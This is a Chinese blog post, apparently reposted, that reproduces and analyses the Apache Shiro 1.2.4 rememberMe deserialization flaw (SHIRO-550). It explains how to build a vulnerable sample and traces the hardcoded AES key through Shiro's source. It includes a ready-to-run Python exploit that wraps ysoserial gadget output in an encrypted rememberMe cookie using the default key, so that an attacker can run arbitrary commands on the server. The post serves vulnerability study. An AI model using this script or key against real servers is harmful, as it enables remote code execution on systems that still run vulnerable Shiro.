Shiro rememberMe 反序列化分析

栏目: IT技术 · 发布时间: 4年前

内容简介:Shiro 550然后导入maven项目之后,在如果你爆了toolchains相关的错误,就在

Shiro 550

复现

git clone https://github.com/apache/shiro.git
git checkout shiro-root-1.2.4

然后导入maven项目之后,在 samples/web/pom.xml 配置jstl版本和反序列化用到的gadget链依赖。

<properties>
    <maven.compiler.source>1.6</maven.compiler.source>
    <maven.compiler.target>1.6</maven.compiler.target>
</properties>
<dependency>
    <groupId>javax.servlet</groupId>
    <artifactId>jstl</artifactId>
    <!-- 配置版本 -->
    <version>1.2</version>
    <scope>runtime</scope>
</dependency>
<!-- 依赖cc链 -->
<dependency>
    <groupId>org.apache.commons</groupId>
    <artifactId>commons-collections4</artifactId>
    <version>4.0</version>
</dependency>

如果你爆了toolchains相关的错误,就在 C:\Users\username\.m2\toolchains.xml 配置toolchains

<?xml version="1.0" encoding="UTF8"?>
<toolchains>
    <toolchain>
        <type>jdk</type>
        <provides>
            <version>1.6</version>
            <vendor>sun</vendor>
        </provides>
        <configuration>
            <jdkHome>C:\Program Files\Java\jdk1.8.0_181</jdkHome>
        </configuration>
    </toolchain>
</toolchains>

maven package之后将war包放到tomcat7下部署,运行之后就是这样

Shiro rememberMe 反序列化分析

使用 shiro_tool.jar 复现:

Shiro rememberMe 反序列化分析

也可以使用 python 脚本

import sys
import base64
import uuid
from random import Random
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(payload,command):
    popen = subprocess.Popen(['java', '-jar', '../ysoserial/ysoserial-0.0.6-SNAPSHOT-all.jar', payload, command], stdout=subprocess.PIPE)
    BS   = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = "kPH+bIxk5D2deZiIxcaaaA=="
    mode =  AES.MODE_CBC
    #iv   =  base64.b64decode(rememberMe)[:16]   
    iv = uuid.uuid4().bytes
    print(iv)
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    print(sys.argv[1],sys.argv[2])
    payload = encode_rememberme(sys.argv[1],sys.argv[2])
    with open("payload.cookie", "w") as fpw:
        print("rememberMe={}".format(payload.decode()), file=fpw)

将文件中的贴到cookie中请求即可。

分析

首先要知道shiro是一个用来做身份验证的框架,其原理是基于servlet的filter进行的。在web.xml中定义了ShiroFilter,作用范围是当前目录下所有的url

Shiro rememberMe 反序列化分析

cookie的处理在 CookieRememberMeManager 类,继承了 AbstractRememberMeManager ,在 AbstractRememberMeManager 中硬编码了加密密钥 DEFAULT_CIPHER_KEY_BYTES
Shiro rememberMe 反序列化分析

加密方式为AES对称加密,AES有了密钥还需要加密算法和初始化向量IV, AbstractRememberMeManager 中加密函数调用了CipherService接口,实现其方法的是JcaCipherService类

Shiro rememberMe 反序列化分析

在该类的encrypt()中发现IV自动生成,长度16个字节

Shiro rememberMe 反序列化分析

并且加密模式为CBC

Shiro rememberMe 反序列化分析

在encrypt中会先将IV写入

Shiro rememberMe 反序列化分析

所以我们直接读原始cookie前16个字节获取。

最后一点就是在encrypt()中字节数组serialized在何处序列化和反序列化的?

serialized在convertPrincipalsToBytes()被赋值

Shiro rememberMe 反序列化分析

可以看到是一个PrincipalCollection对象,而PrincipalCollection是一个接口,其实现类

Shiro rememberMe 反序列化分析

仅有SimplePrincipalCollection实现了readObject,这也是反序列化的入口,但是在哪触发的?

org.apache.shiro.mgt.AbstractRememberMeManager#deserialize 中一步步跟进

Shiro rememberMe 反序列化分析

最终找到了 org.apache.shiro.io.DefaultSerializer#deserialize
Shiro rememberMe 反序列化分析

到此为止

总结

因为AES硬编码的问题导致的RCE,自己对于加密与解密不是很了解,这方面有待学习。

参考

  1. https://xz.aliyun.com/t/6493
  2. https://xz.aliyun.com/t/7207
  3. https://paper.seebug.org/shiro-rememberme-1-2-4/
  4. https://issues.apache.org/jira/browse/SHIRO-550

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。


以上所述就是小编给大家介绍的《Shiro rememberMe 反序列化分析》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

HTTP权威指南

HTTP权威指南

David Gourley、Brian Totty / 陈涓、赵振平 / 人民邮电出版社 / 2012-9 / 109.00元

超文本转移协议(Hypertext Transfer Protocol,HTTP)是在万维网上进行通信时所使用的协议方案。HTTP有很多应用,但最著名的是用于web浏览器和web服务器之间的双工通信。 HTTP起初是一个简单的协议,因此你可能会认为关于这个协议没有太多好 说的。但现在,你手上拿着的是却一本两磅重 的书。如果你对我们怎么会写出一本650页 的关于HTTP的书感到奇怪的话,可以去......一起来看看 《HTTP权威指南》 这本书的介绍吧!

html转js在线工具
html转js在线工具

html转js在线工具

UNIX 时间戳转换
UNIX 时间戳转换

UNIX 时间戳转换

RGB HSV 转换
RGB HSV 转换

RGB HSV 互转工具